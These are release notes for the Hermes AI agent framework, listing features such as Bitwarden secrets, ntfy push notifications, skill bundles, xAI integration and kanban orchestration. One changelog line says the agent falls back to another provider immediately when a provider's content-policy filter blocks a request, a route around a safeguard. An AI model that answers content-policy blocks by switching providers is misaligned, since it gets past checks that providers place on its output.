- **Bitwarden Secrets Manager — one bootstrap token replaces every per-provider API key** — Stop keeping plaintext API keys in `~/.hermes/.env`. Install Bitwarden Secrets Manager (`bws` auto-installs lazily on first use), point Hermes at it with one bootstrap token (`BWS_ACCESS_TOKEN`), and every credential you need comes from Bitwarden at startup. Rotate a key in the Bitwarden web app and the rotation actually takes effect — Bitwarden defaults to source-of-truth so its values overwrite matching env vars on startup. Flip `secrets.bitwarden.override_existing: false` to invert. EU Cloud and self-hosted Bitwarden server URLs supported. Detected credentials are now labeled with their source so you can see at a glance which keys came from Bitwarden vs. the local env. ([#30035](https://github.com/NousResearch/hermes-agent/pull/30035), [#31378](https://github.com/NousResearch/hermes-agent/pull/31378), [#30364](https://github.com/NousResearch/hermes-agent/pull/30364))
- **ntfy as the 23rd messaging platform — push notifications without an account** — ntfy is the self-hostable push-notification service with no signup, no API key, just a topic URL. Hermes now adapts to it as a platform plugin (zero edits to core), so your agent can send you push notifications from any cron job, kanban task completion, or chat `send_message` — to your phone, your watch, your desktop, your homelab. (salvages [#30625](https://github.com/NousResearch/hermes-agent/pull/30625) → originally [#4043](https://github.com/NousResearch/hermes-agent/pull/4043)) ([#30867](https://github.com/NousResearch/hermes-agent/pull/30867))
- **Skill bundles — `/<name>` loads multiple skills at once** — A skill bundle is a named group of skills that loads them all together with one slash command. Set up your "writing day" bundle (humanizer + ideation + obsidian + youtube-content) and `/writing-day` activates all four for the session. Skills Hub now has health checks, a freshness badge, and a watchdog cron. Three new optional skills land: `code-wiki` (Karpathy's LLM-Wiki, persistent indexed dev wiki), `openhands` (delegate to OpenHands for parallel coding agents), and `web-pentest` (OWASP-style web pentest recipes). ([#28373](https://github.com/NousResearch/hermes-agent/pull/28373), [#32345](https://github.com/NousResearch/hermes-agent/pull/32345), [#32240](https://github.com/NousResearch/hermes-agent/pull/32240), [#32261](https://github.com/NousResearch/hermes-agent/pull/32261), [#32265](https://github.com/NousResearch/hermes-agent/pull/32265))
- **TUI session orchestrator — multiple live sessions in one TUI window** — The Ink TUI gained an active-session switcher overlay. List, switch between, refresh, and close multiple live process-local sessions without leaving the TUI; dispatch a new session with a session-scoped model picker. Plus a wave of TUI polish — mouse-tracking DEC mode presets, scrollback preservation across branches and termux, slash-dropdown fixes, x.com link rendering, and CJK / IME input rendering improvements. (salvages [#27642](https://github.com/NousResearch/hermes-agent/pull/27642)) ([#32980](https://github.com/NousResearch/hermes-agent/pull/32980), [#30084](https://github.com/NousResearch/hermes-agent/pull/30084))
- **Two new image_gen providers — Krea 2 Medium + Large, FAL ported to plugin** — Krea joins the image_gen lineup as a built-in plugin: `Krea 2 Medium` ($0.03) and `Krea 2 Large` ($0.06), auto-discovered, selectable via `hermes tools` → Image Generation → Krea. Available through both the native Krea plugin and the FAL.ai catalog. The FAL.ai backend got pulled out of the monolithic image-generation tool into `plugins/image_gen/fal/`, completing the four-way architectural parity already established by web, browser, and video_gen — new image providers are now one file, not a fork. ([#33236](https://github.com/NousResearch/hermes-agent/pull/33236), [#30380](https://github.com/NousResearch/hermes-agent/pull/30380), [#33506](https://github.com/NousResearch/hermes-agent/pull/33506))
- **Nous-approved MCP catalog with interactive picker** — A curated catalog of Nous-vetted MCP servers, mirroring the optional-skills shape. Run `hermes mcp` and you get an interactive picker; install with one keystroke, credentials prompted at install time and written to `~/.hermes/.env`. Ships with the n8n manifest first. Closes the discovery gap that left users hunting GitHub for trusted MCP servers. ([#30870](https://github.com/NousResearch/hermes-agent/pull/30870))
- **OpenHands orchestration skill** — A new optional skill under `optional-skills/autonomous-ai-agents/openhands/` lets the agent delegate coding tasks to the OpenHands CLI alongside `claude-code`, `codex`, and `opencode`. OpenHands is the model-agnostic member of that family — any LiteLLM-supported provider works (OpenAI, Anthropic, OpenRouter, your own), so you can route a sub-task to the cheapest model that can finish it. Drop-in worker for kanban swarms and `/delegate` flows. (closes [#477](https://github.com/NousResearch/hermes-agent/issues/477)) ([#32261](https://github.com/NousResearch/hermes-agent/pull/32261))
- **Deep xAI integration round — Web Search plugin, OAuth proxy upstream, May 15 retirement detection, natural TTS, security hardening** — Six interlocking xAI improvements:
- **xAI Web Search** lands as a `plugins/web/xai/` provider, slots alongside Brave / Tavily / Exa / SearXNG / DDGS / Firecrawl — reuses your existing Grok OAuth or `XAI_API_KEY` credentials, no new env vars. ([#29042](https://github.com/NousResearch/hermes-agent/pull/29042))
- **`hermes proxy` gains an xAI upstream** — your local OpenAI-compatible endpoint can now be backed by SuperGrok OAuth, no PKCE-refresh code to write in your client. ([#28356](https://github.com/NousResearch/hermes-agent/pull/28356))
- **May 15 model retirement detection** — `grok-4`, `grok-4-fast{,-reasoning,-non-reasoning}`, `grok-3`, `grok-code-fast-1`, `grok-imagine-image-pro` etc. are detected in doctor and chat startup, with `hermes migrate xai` to one-shot config migration to the supported model. No more silent 404s after the retirement date. ([#29277](https://github.com/NousResearch/hermes-agent/pull/29277))
- **Opt-in `auto_speech_tags`** for xAI TTS — inserts light `[pause]` tags between paragraphs and sentences for more natural-sounding voice replies. Default OFF. ([#29376](https://github.com/NousResearch/hermes-agent/pull/29376))
- **`xai-oauth` `base_url` pinned to `x.ai` origin** — closes a silent credential-leak vector where `XAI_BASE_URL` could repoint OAuth-authenticated inference to an attacker-controlled host. ([#28952](https://github.com/NousResearch/hermes-agent/pull/28952))
- **OpenAI-style execution guidance applied to Grok models** — Grok and xai-oauth now get the same family-specific execution discipline block GPT/Codex have, so the model stops claiming completion without tool calls and stops suggesting workarounds instead of using existing tools. ([#27797](https://github.com/NousResearch/hermes-agent/pull/27797))
- Plus `x_search` degraded-results surfacing, tier-gated 403 with API-key fallback, PKCE `code_challenge` round-trip fix, dead-token quarantine on terminal refresh failure, MiniMax-style short-token refresh on per-request, and `WKE=unauthenticated` honor at both classifier sites. ([#29484](https://github.com/NousResearch/hermes-agent/pull/29484), [#28351](https://github.com/NousResearch/hermes-agent/pull/28351), [#27560](https://github.com/NousResearch/hermes-agent/pull/27560), [#28116](https://github.com/NousResearch/hermes-agent/pull/28116), [#30619](https://github.com/NousResearch/hermes-agent/pull/30619), [#30872](https://github.com/NousResearch/hermes-agent/pull/30872))
---
## 🏗️ Core Agent & Architecture
### The Big Refactor — `run_agent.py` 16k → 3.8k
- `run_agent.py` from 16,083 → 3,821 lines (-76%), extracted into 14 cohesive `agent/*` modules. `run_conversation` alone was 3,877 lines before the refactor. Every extraction keeps a thin forwarder on `AIAgent`, every test-patch path is preserved, every external caller stays compatible. ([#27248](https://github.com/NousResearch/hermes-agent/pull/27248))
### Agent loop & conversation
- Auxiliary task layered fallback (primary → chain → main agent → graceful fail) on capacity errors (402/429/connection). (salvages [#26811](https://github.com/NousResearch/hermes-agent/pull/26811) + [#26998](https://github.com/NousResearch/hermes-agent/pull/26998)) ([#27625](https://github.com/NousResearch/hermes-agent/pull/27625))
- Buffer retry/fallback status; surface only on terminal failure (no more noisy "retrying..." spam in mid-run output). ([#33816](https://github.com/NousResearch/hermes-agent/pull/33816))
- Host contract for external context engines — condenses 5 prior PRs into one extension surface. ([#33750](https://github.com/NousResearch/hermes-agent/pull/33750))
- Fallback immediately on provider content-policy blocks. ([#33883](https://github.com/NousResearch/hermes-agent/pull/33883))
- Re-pad `reasoning_content` on cross-provider fallback to require-side providers. (salvage [#33784](https://github.com/NousResearch/hermes-agent/pull/33784)) ([#33795](https://github.com/NousResearch/hermes-agent/pull/33795))
- Per-turn tool-outcome verifier — patch tool gets indent preservation, CRLF preservation, per-file failure escalation. ([#32273](https://github.com/NousResearch/hermes-agent/pull/32273))
- Single-knob native vision for custom-provider models. ([#29679](https://github.com/NousResearch/hermes-agent/pull/29679))
- Background review fork isolated from external memory plugins. ([#27190](https://github.com/NousResearch/hermes-agent/pull/27190))
- Background review inherits parent toolset config for `tools[]` cache parity. ([#29704](https://github.com/NousResearch/hermes-agent/pull/29704))
- Recover from providers returning list-type tool content. ([#30259](https://github.com/NousResearch/hermes-agent/pull/30259))
- Treat partial-stream stub responses as length truncation rather than clean stop. ([#30998](https://github.com/NousResearch/hermes-agent/pull/30998))
- OpenAI execution guidance applied to xAI Grok / xai-oauth. ([#27797](https://github.com/NousResearch/hermes-agent/pull/27797))
- ContextVars propagate to concurrent tool worker threads.
- Preload `jiter` native parser. ([#33692](https://github.com/NousResearch/hermes-agent/pull/33692))
- Expose context engine tools with saved toolsets. (salvage of [#31194](https://github.com/NousResearch/hermes-agent/pull/31194)) ([#33719](https://github.com/NousResearch/hermes-agent/pull/33719))
### Sessions & memory
- `session_search` rebuilt — single-shape (discovery + scroll + browse), no aux-LLM, ~20ms vs. ~90s. ([#27590](https://github.com/NousResearch/hermes-agent/pull/27590))
- Salvage [#29182](https://github.com/NousResearch/hermes-agent/pull/29182) — opt-in JSON snapshot writer for sessions. ([#29278](https://github.com/NousResearch/hermes-agent/pull/29278))
- Persist `platform_message_id` for recall across gateway restarts. ([#29449](https://github.com/NousResearch/hermes-agent/pull/29449))
- Inline memory-context mentions stay visible in conversation. ([#28132](https://github.com/NousResearch/hermes-agent/pull/28132))
- Recalled memory labeled informational, not authoritative. ([#28583](https://github.com/NousResearch/hermes-agent/pull/28583))
- Memory + context-engine tool injection gated on `enabled_toolsets`. ([#30177](https://github.com/NousResearch/hermes-agent/pull/30177))
- Guard against external drift in `MEMORY.md` / `USER.md`. ([#30877](https://github.com/NousResearch/hermes-agent/pull/30877))
- Honcho runtime peer mapping — correctness follow-ups + setup wizard + docs. ([#30077](https://github.com/NousResearch/hermes-agent/pull/30077))
- Periodic memory logging for leak detection. (salvage of [#17667](https://github.com/NousResearch/hermes-agent/pull/17667)) ([#27102](https://github.com/NousResearch/hermes-agent/pull/27102))
### Codex / Responses-API maturation
- TTFB watchdog for stalled Codex Responses streams. ([#32042](https://github.com/NousResearch/hermes-agent/pull/32042))
- Actionable hint when stale-call detector fires on known silent-reject pattern. ([#32016](https://github.com/NousResearch/hermes-agent/pull/32016), [#33133](https://github.com/NousResearch/hermes-agent/pull/33133))
- Drop SDK `responses.stream()` helper; consume events directly. ([#33042](https://github.com/NousResearch/hermes-agent/pull/33042))
- Gracefully recover from `invalid_encrypted_content`. (salvage of [#10144](https://github.com/NousResearch/hermes-agent/pull/10144)) ([#33035](https://github.com/NousResearch/hermes-agent/pull/33035))
- Recover Codex Responses streams with null output. ([#32963](https://github.com/NousResearch/hermes-agent/pull/32963), [#33390](https://github.com/NousResearch/hermes-agent/pull/33390))
- Drop foreign-issuer reasoning and transient `rs_tmp` reasoning replay state. ([#33156](https://github.com/NousResearch/hermes-agent/pull/33156), [#33146](https://github.com/NousResearch/hermes-agent/pull/33146))
- Codex 429 quota classified as rate-limit, not missing credentials. ([#33168](https://github.com/NousResearch/hermes-agent/pull/33168))
- Codex chat path falls back to credential_pool when singleton is empty. ([#33189](https://github.com/NousResearch/hermes-agent/pull/33189))
- Codex re-auth syncs credential_pool. ([#33164](https://github.com/NousResearch/hermes-agent/pull/33164))
- Omit `tools` key when no tools registered. ([#33409](https://github.com/NousResearch/hermes-agent/pull/33409))
- Parse Codex image-generation SSE directly. ([#32933](https://github.com/NousResearch/hermes-agent/pull/32933))
---
## 🎛️ Kanban — Multi-Agent Maturation Wave
### Orchestration & dispatch
- Orchestrator-driven auto-decomposition on triage. ([#27572](https://github.com/NousResearch/hermes-agent/pull/27572))
- Kanban swarm topology helper — `hermes kanban swarm` creates a Swarm v1 graph (root + parallel workers + gated verifier + gated synthesizer + shared blackboard). (salvages [#26791](https://github.com/NousResearch/hermes-agent/pull/26791) by @Niraven) ([#28443](https://github.com/NousResearch/hermes-agent/pull/28443))
- Dispatcher wires review agents from the review column. ([#28449](https://github.com/NousResearch/hermes-agent/pull/28449))
- Stale-detection for running tasks in dispatcher. ([#28452](https://github.com/NousResearch/hermes-agent/pull/28452))
- Respawn guard blocks repeat worker storms. ([#28455](https://github.com/NousResearch/hermes-agent/pull/28455))
- Respawn guard defers `blocker_auth` instead of auto-blocking. ([#28683](https://github.com/NousResearch/hermes-agent/pull/28683))
- Cross-profile cron jobs surface in dashboard. ([#28457](https://github.com/NousResearch/hermes-agent/pull/28457))
- Worker visibility endpoints: `/workers/active`, `/runs/{id}`, `/inspect`. (salvages [#23761](https://github.com/NousResearch/hermes-agent/pull/23761) by @Interstellar-code) ([#28432](https://github.com/NousResearch/hermes-agent/pull/28432))
### Task configuration & scheduling
- Per-task model override. ([#28364](https://github.com/NousResearch/hermes-agent/pull/28364))
- Board-level default workdir. ([#28394](https://github.com/NousResearch/hermes-agent/pull/28394))
- Configurable worktree paths and branches. ([#28462](https://github.com/NousResearch/hermes-agent/pull/28462))
- Scheduled task start times. ([#28384](https://github.com/NousResearch/hermes-agent/pull/28384))
- Scheduled status for delayed follow-ups. ([#28467](https://github.com/NousResearch/hermes-agent/pull/28467))
- Trimmed task comments. ([#28399](https://github.com/NousResearch/hermes-agent/pull/28399))
- Initial-status for human-ops cards. ([#28414](https://github.com/NousResearch/hermes-agent/pull/28414))
- `max_in_progress` config to cap concurrent running tasks. ([#28420](https://github.com/NousResearch/hermes-agent/pull/28420))
- Filter tasks by workflow fields. ([#28454](https://github.com/NousResearch/hermes-agent/pull/28454))
- `--sort` for `hermes kanban list`. ([#28427](https://github.com/NousResearch/hermes-agent/pull/28427))
- Optional `board` parameter on all MCP tools. ([#28444](https://github.com/NousResearch/hermes-agent/pull/28444))
- Stamp originating ACP session_id on tasks. ([#28447](https://github.com/NousResearch/hermes-agent/pull/28447))
- `auto_promote_children` config toggle. ([#28344](https://github.com/NousResearch/hermes-agent/pull/28344))
- `archive --rm` to hard-delete archived tasks. ([#28355](https://github.com/NousResearch/hermes-agent/pull/28355))
- Promote dependents when parent is archived. ([#28372](https://github.com/NousResearch/hermes-agent/pull/28372))
- Promote blocked tasks when parent dependencies complete. ([#28377](https://github.com/NousResearch/hermes-agent/pull/28377))
- Demote ready children when parent is reopened. ([#28382](https://github.com/NousResearch/hermes-agent/pull/28382))
- `promote` verb for manual `todo→ready` recovery + bulk `--ids`. (salvage [#29464](https://github.com/NousResearch/hermes-agent/pull/29464)) ([#31334](https://github.com/NousResearch/hermes-agent/pull/31334))
### Dashboard
- Drag-to-delete trash zone + bulk delete. ([#28468](https://github.com/NousResearch/hermes-agent/pull/28468))
- Surface per-task `model_override` in show + tool output. ([#28442](https://github.com/NousResearch/hermes-agent/pull/28442))
- Cross-profile notification delivery via `kanban.notification_sources`. ([#28395](https://github.com/NousResearch/hermes-agent/pull/28395))
- Scratch-workspace deletion warning for users. ([#30949](https://github.com/NousResearch/hermes-agent/pull/30949))
- Mobile dashboard UX polish. ([#28127](https://github.com/NousResearch/hermes-agent/pull/28127))
### Reliability
- Worker log retention configurable. ([#27867](https://github.com/NousResearch/hermes-agent/pull/27867))
- Configurable claim TTL. ([#28392](https://github.com/NousResearch/hermes-agent/pull/28392))
- Fingerprint crash errors to prevent fleet-wide retry exhaustion. ([#28380](https://github.com/NousResearch/hermes-agent/pull/28380))
- Reset failure counters on `unblock_task`. ([#28379](https://github.com/NousResearch/hermes-agent/pull/28379))
- Detect cycles in `decompose_triage_task` sibling-link pre-validation. ([#28088](https://github.com/NousResearch/hermes-agent/pull/28088))
- Surface unusable triage auxiliary model (auto-decompose aware). ([#27871](https://github.com/NousResearch/hermes-agent/pull/27871))
- Align failure diagnostics with retry limit. ([#27868](https://github.com/NousResearch/hermes-agent/pull/27868))
- Align worker terminal timeout with task runtime. ([#27864](https://github.com/NousResearch/hermes-agent/pull/27864))
- Auto-install bundled skills (kanban-worker) on init. ([#28368](https://github.com/NousResearch/hermes-agent/pull/28368))
- Make legacy task migration idempotent. ([#28397](https://github.com/NousResearch/hermes-agent/pull/28397))
- Serialize DB initialization. ([#28383](https://github.com/NousResearch/hermes-agent/pull/28383))
- Persist worker session metadata on completion. ([#28387](https://github.com/NousResearch/hermes-agent/pull/28387))
- Pass `accept-hooks` to worker chat subprocess. ([#28393](https://github.com/NousResearch/hermes-agent/pull/28393))
- Preserve worker tools with restricted toolsets. ([#28396](https://github.com/NousResearch/hermes-agent/pull/28396))
- Avoid unsafe Windows worker Hermes shim resolution. ([#28398](https://github.com/NousResearch/hermes-agent/pull/28398))
- Sync slash subcommands with live parser. ([#28376](https://github.com/NousResearch/hermes-agent/pull/28376))
- Show scheduled kanban tasks in dashboard. ([#28400](https://github.com/NousResearch/hermes-agent/pull/28400))
- Assign single-task kanban decompositions. ([#28401](https://github.com/NousResearch/hermes-agent/pull/28401))
- Configurable `max_tokens` for kanban specify. ([#28374](https://github.com/NousResearch/hermes-agent/pull/28374))
- Per-job profile support for cron. ([#28124](https://github.com/NousResearch/hermes-agent/pull/28124))
- Codex app-server: include every Kanban-pinned path in `writable_roots`. ([#28435](https://github.com/NousResearch/hermes-agent/pull/28435))
- Cache kanban worker guidance at session init for prompt-cache reuse. ([#28425](https://github.com/NousResearch/hermes-agent/pull/28425))
---
## ⚡ Performance
- `openai._base_client` import deferred — 240ms / 17MB off every CLI cold start. ([#28864](https://github.com/NousResearch/hermes-agent/pull/28864))
- Agent-loop hot-path optimizations — 47% fewer per-conversation function calls (399k → 213k for 31-turn chat). ([#28866](https://github.com/NousResearch/hermes-agent/pull/28866))
- Compression-feasibility check deferred — 170-290ms off every agent construction. ([#28957](https://github.com/NousResearch/hermes-agent/pull/28957))
- Adaptive subprocess poll — ~195ms off every tool call, 1+ second per turn. ([#29006](https://github.com/NousResearch/hermes-agent/pull/29006))
- Termux TUI cold start speedup. ([#29419](https://github.com/NousResearch/hermes-agent/pull/29419))
- Termux non-TUI cold start speedup. (salvage [#29438](https://github.com/NousResearch/hermes-agent/pull/29438)) ([#30121](https://github.com/NousResearch/hermes-agent/pull/30121))
- Termux fast-path version + deferred bare-prompt agent startup. ([#30609](https://github.com/NousResearch/hermes-agent/pull/30609))
- Cut hermes `--version` wall time 63% — flips head-to-head vs Codex CLI. ([#31968](https://github.com/NousResearch/hermes-agent/pull/31968))
- Date-only timestamp + loud gateway-DB roundtrip logging — improves prompt-cache hit rate. ([#27675](https://github.com/NousResearch/hermes-agent/pull/27675))
- Cache kanban worker guidance at session init for prompt-cache reuse. ([#28425](https://github.com/NousResearch/hermes-agent/pull/28425))
---
## 🔧 Tool System
### Tool surface
- `patch`: indent preservation, CRLF preservation, per-file failure escalation. ([#32273](https://github.com/NousResearch/hermes-agent/pull/32273))
- `terminal`: warn at call time when `background=true` runs silently. ([#31289](https://github.com/NousResearch/hermes-agent/pull/31289))
- `terminal`: nudge homebrewed CI pollers at the tool surface. ([#33142](https://github.com/NousResearch/hermes-agent/pull/33142))
- `x_search`: surface degraded results + validate dates. ([#29484](https://github.com/NousResearch/hermes-agent/pull/29484))
- `x_search`: auto-enable toolset when xAI credentials are configured. ([#27376](https://github.com/NousResearch/hermes-agent/pull/27376))
- `computer_use`: route SOM/vision captures via auxiliary.vision. ([#30126](https://github.com/NousResearch/hermes-agent/pull/30126))
- `transcription`: reject symlinked audio inputs. ([#10082](https://github.com/NousResearch/hermes-agent/pull/10082))
- TTS: prevent double `[pause]` in xAI auto speech tags. ([#32237](https://github.com/NousResearch/hermes-agent/pull/32237))
- TTS: preserve native audio outside Telegram voice delivery. ([#28512](https://github.com/NousResearch/hermes-agent/pull/28512))
- TTS: opt-in xAI `auto_speech_tags` speech-tag pauses for natural voice replies. ([#29376](https://github.com/NousResearch/hermes-agent/pull/29376))
- Voice: chunk oversized CLI recordings. ([#30044](https://github.com/NousResearch/hermes-agent/pull/30044))
- Voice: honor `PULSE_SERVER` / `PIPEWIRE_REMOTE` inside Docker. ([#22534](https://github.com/NousResearch/hermes-agent/pull/22534))
### Browser
- All cloud browser providers (Browserbase, Anchor, Camofox, Hyperbrowser, etc.) migrated to image_gen-style plugins. (salvages [#25580](https://github.com/NousResearch/hermes-agent/pull/25580)) ([#27403](https://github.com/NousResearch/hermes-agent/pull/27403))
- Auto-launch Chromium-family browser for CDP. ([#29106](https://github.com/NousResearch/hermes-agent/pull/29106))
- Docker: discover agent-browser Chromium binary at boot. ([#33184](https://github.com/NousResearch/hermes-agent/pull/33184))
### Image generation
- **Krea** provider plugin (Krea 2 Medium + Large). ([#33236](https://github.com/NousResearch/hermes-agent/pull/33236))
- FAL backend ported to `plugins/image_gen/fal`. (salvage [#27966](https://github.com/NousResearch/hermes-agent/pull/27966)) ([#30380](https://github.com/NousResearch/hermes-agent/pull/30380))
- Cache xAI ephemeral URL responses to disk. ([#31759](https://github.com/NousResearch/hermes-agent/pull/31759))
### Web search
- **xAI Web Search** as a provider plugin. ([#29042](https://github.com/NousResearch/hermes-agent/pull/29042))
### MCP
- **Nous-approved MCP catalog** with interactive picker. ([#30870](https://github.com/NousResearch/hermes-agent/pull/30870))
- **TLS client certificate (mTLS) support** for HTTP and SSE MCP servers. ([#33721](https://github.com/NousResearch/hermes-agent/pull/33721))
- Stdin paste-back fallback for headless OAuth flow. ([#32053](https://github.com/NousResearch/hermes-agent/pull/32053))
- `skip` at paste prompt bypasses auth without disabling server. ([#32069](https://github.com/NousResearch/hermes-agent/pull/32069))
- Registry-aware `mcp_` prefix on both ends of round-trip. ([#31700](https://github.com/NousResearch/hermes-agent/pull/31700))
---
## 🧩 Skills Ecosystem
### Skills system
- **Skill bundles** — `/<name>` loads multiple skills. ([#28373](https://github.com/NousResearch/hermes-agent/pull/28373))
- Skills Hub: health checks, freshness badge, and a watchdog cron. ([#32345](https://github.com/NousResearch/hermes-agent/pull/32345))
- Opt-in AST deep diagnostics on skill writes. (salvage of [#30918](https://github.com/NousResearch/hermes-agent/pull/30918)) ([#31198](https://github.com/NousResearch/hermes-agent/pull/31198))
- Bundled/pinned skill protection in background-review prompts. ([#28338](https://github.com/NousResearch/hermes-agent/pull/28338))
- Show user-modified skill names in bundled skill sync summary. ([#28671](https://github.com/NousResearch/hermes-agent/pull/28671))
- Load symlinked skill slash commands. ([#27759](https://github.com/NousResearch/hermes-agent/pull/27759))
- Deduplicate Skills Hub search results by identifier, not name. ([#29490](https://github.com/NousResearch/hermes-agent/pull/29490))
### New skills
- `openhands` — delegate-to-OpenHands orchestration skill (closes [#477](https://github.com/NousResearch/hermes-agent/issues/477)) ([#32261](https://github.com/NousResearch/hermes-agent/pull/32261))
- `code-wiki` — persistent indexed dev wiki (closes [#486](https://github.com/NousResearch/hermes-agent/issues/486)) ([#32240](https://github.com/NousResearch/hermes-agent/pull/32240))
- `web-pentest` — OWASP recipes (closes [#400](https://github.com/NousResearch/hermes-agent/issues/400)) ([#32265](https://github.com/NousResearch/hermes-agent/pull/32265))
- `baoyu-article-illustrator` ([#28287](https://github.com/NousResearch/hermes-agent/pull/28287))
---
## ☁️ Providers
### xAI deep integration
- **xAI Web Search** as a `plugins/web/xai/` provider plugin. ([#29042](https://github.com/NousResearch/hermes-agent/pull/29042))
- **`hermes proxy` xAI upstream** — OpenAI-compatible local proxy backed by xai-oauth. ([#28356](https://github.com/NousResearch/hermes-agent/pull/28356))
- **May 15 model retirement detection + `hermes migrate xai`** for grok-4 / grok-3 / grok-code-fast-1 / grok-imagine-image-pro. ([#29277](https://github.com/NousResearch/hermes-agent/pull/29277))
- **Opt-in `auto_speech_tags`** for natural xAI TTS voice replies. ([#29376](https://github.com/NousResearch/hermes-agent/pull/29376))
- **xai-oauth base_url pinned to x.ai origin** — closes silent credential-leak vector. ([#28952](https://github.com/NousResearch/hermes-agent/pull/28952))
- **OpenAI-style execution guidance** applied to Grok / xai-oauth models. ([#27797](https://github.com/NousResearch/hermes-agent/pull/27797))
- xAI: detect retired May 15 models in doctor/chat startup. ([#29277](https://github.com/NousResearch/hermes-agent/pull/29277))
- xAI: resolve Grok Build context for OAuth. ([#30579](https://github.com/NousResearch/hermes-agent/pull/30579))
- xAI OAuth: tier-gated 403 with API-key fallback. ([#28351](https://github.com/NousResearch/hermes-agent/pull/28351))
- xAI OAuth: PKCE `code_challenge` echo. ([#27560](https://github.com/NousResearch/hermes-agent/pull/27560))
- xAI OAuth: quarantine dead tokens on terminal refresh failure. ([#28116](https://github.com/NousResearch/hermes-agent/pull/28116))
- xAI OAuth: honor `WKE=unauthenticated` disambiguator at both classifier sites. ([#30872](https://github.com/NousResearch/hermes-agent/pull/30872))
- xAI OAuth: accept bare-code manual paste (state=None). (closes [#26923](https://github.com/NousResearch/hermes-agent/issues/26923)) ([#33880](https://github.com/NousResearch/hermes-agent/pull/33880))
- xAI OAuth: fall back to manual paste on loopback timeout. ([#33231](https://github.com/NousResearch/hermes-agent/pull/33231))
- xAI proxy: handle 429 rate-limit responses in proxy retry path. ([#33743](https://github.com/NousResearch/hermes-agent/pull/33743))
### Other providers
- **OpenAI API as a first-class provider** (distinct from Codex runtime). ([#31898](https://github.com/NousResearch/hermes-agent/pull/31898))
- **Microsoft Entra ID** auth for Azure Foundry (with 1M Anthropic-Messages beta preserved on Bearer). (salvages [#27509](https://github.com/NousResearch/hermes-agent/pull/27509), [#27022](https://github.com/NousResearch/hermes-agent/pull/27022)) ([#28101](https://github.com/NousResearch/hermes-agent/pull/28101), [#28084](https://github.com/NousResearch/hermes-agent/pull/28084))
- **OpenRouter** sticky routing — `session_id` passed via `extra_body` so a long-running session keeps landing on the same upstream provider. (@Cybourgeoisie) ([#33939](https://github.com/NousResearch/hermes-agent/pull/33939))
- Nous: JWT token for inference; stop replaying invalid Nous refresh tokens. (@rewbs) ([#27663](https://github.com/NousResearch/hermes-agent/pull/27663))
- Nous Portal: one-shot setup, status CLI, and Nous-included markers. ([#30860](https://github.com/NousResearch/hermes-agent/pull/30860))
- Anthropic adapter: extract 7 helpers from `convert_messages_to_anthropic`. (salvage [#27784](https://github.com/NousResearch/hermes-agent/pull/27784)) ([#30386](https://github.com/NousResearch/hermes-agent/pull/30386))
- Catalog: add `qwen3.7-max` to Alibaba + Alibaba-Coding-Plan model lists. ([#33129](https://github.com/NousResearch/hermes-agent/pull/33129))
- opencode-go: route `qwen3.7-max` via `anthropic_messages`. (@beardthelion) ([#32780](https://github.com/NousResearch/hermes-agent/pull/32780))
- opencode-go: expose Kimi K2 + DeepSeek reasoning controls. ([#30845](https://github.com/NousResearch/hermes-agent/pull/30845))
- Remove Vercel AI Gateway and Vercel Sandbox.
- MiniMax OAuth: refresh short-lived access tokens per request. ([#30619](https://github.com/NousResearch/hermes-agent/pull/30619))
- Codex OAuth: quarantine terminal refresh errors. ([#28118](https://github.com/NousResearch/hermes-agent/pull/28118))
- Codex: drop dead model slugs that HTTP 400 on ChatGPT Pro. ([#33424](https://github.com/NousResearch/hermes-agent/pull/33424))
- Codex: sync `manual:device_code` pool entries on re-auth. ([#33744](https://github.com/NousResearch/hermes-agent/pull/33744))
- MiniMax OAuth: quarantine terminal refresh errors. ([#28119](https://github.com/NousResearch/hermes-agent/pull/28119))
---
## 🔑 Secrets
- **Bitwarden Secrets Manager** integration with lazy `bws` install. ([#30035](https://github.com/NousResearch/hermes-agent/pull/30035))
- Bitwarden: EU Cloud + self-hosted server URL support. ([#31378](https://github.com/NousResearch/hermes-agent/pull/31378))
- Label detected credentials with their source (Bitwarden). ([#30364](https://github.com/NousResearch/hermes-agent/pull/30364))
---
## 📱 Messaging Platforms (Gateway)
### Gateway core
- **Deliverable mode** — agents ship artifacts as native uploads from any platform (Slack/Discord/Telegram/Teams/Email). ([#27813](https://github.com/NousResearch/hermes-agent/pull/27813))
- `hermes send` — pipe any script's output to any messaging platform. (salvage of [#19631](https://github.com/NousResearch/hermes-agent/pull/19631)) ([#27188](https://github.com/NousResearch/hermes-agent/pull/27188))
- Debounce queued text follow-ups during active sessions. (salvage of [#31235](https://github.com/NousResearch/hermes-agent/pull/31235)) ([#31341](https://github.com/NousResearch/hermes-agent/pull/31341))
- Plugin-transformed final_response delivered through streaming gate. ([#31433](https://github.com/NousResearch/hermes-agent/pull/31433))
- Refresh cached agent tools on `/reload-mcp`. ([#32815](https://github.com/NousResearch/hermes-agent/pull/32815))
- Harden kanban + provider cleanup races on long-running workloads. ([#29479](https://github.com/NousResearch/hermes-agent/pull/29479))
### New / reorganized adapters
- **ntfy** — 23rd platform, push notifications, plugin shape, zero core edits. (salvages [#30625](https://github.com/NousResearch/hermes-agent/pull/30625) → [#4043](https://github.com/NousResearch/hermes-agent/pull/4043)) ([#30867](https://github.com/NousResearch/hermes-agent/pull/30867))
- **Discord** adapter migrated to bundled plugin. (salvage of [#24356](https://github.com/NousResearch/hermes-agent/pull/24356)) ([#30591](https://github.com/NousResearch/hermes-agent/pull/30591))
- **Mattermost** adapter migrated to bundled plugin. (salvage of [#30916](https://github.com/NousResearch/hermes-agent/pull/30916)) ([#31748](https://github.com/NousResearch/hermes-agent/pull/31748))
### Telegram
- Edit status messages in place instead of appending. (based on [#30141](https://github.com/NousResearch/hermes-agent/pull/30141) by @qike-ms) ([#30864](https://github.com/NousResearch/hermes-agent/pull/30864))
- Skip-STT audio path + 2GB cap via local Bot API server. ([#28541](https://github.com/NousResearch/hermes-agent/pull/28541))
- Route image documents (.png/.jpg/.webp/.gif) through vision pipeline. ([#28519](https://github.com/NousResearch/hermes-agent/pull/28519))
- Route audio file attachments away from STT pipeline. ([#28478](https://github.com/NousResearch/hermes-agent/pull/28478))
- `disable_topic_auto_rename` gateway flag. ([#28523](https://github.com/NousResearch/hermes-agent/pull/28523))
- `ignore_root_dm` config to drop messages without thread_id. ([#28536](https://github.com/NousResearch/hermes-agent/pull/28536))
- Chat-scoped auth without sender user_id. ([#28525](https://github.com/NousResearch/hermes-agent/pull/28525))
- Fail-closed auth fallback when `TELEGRAM_ALLOWED_USERS` is empty. ([#28494](https://github.com/NousResearch/hermes-agent/pull/28494))
- Roll over tool progress bubbles + scope audio_file_paths. ([#28482](https://github.com/NousResearch/hermes-agent/pull/28482))
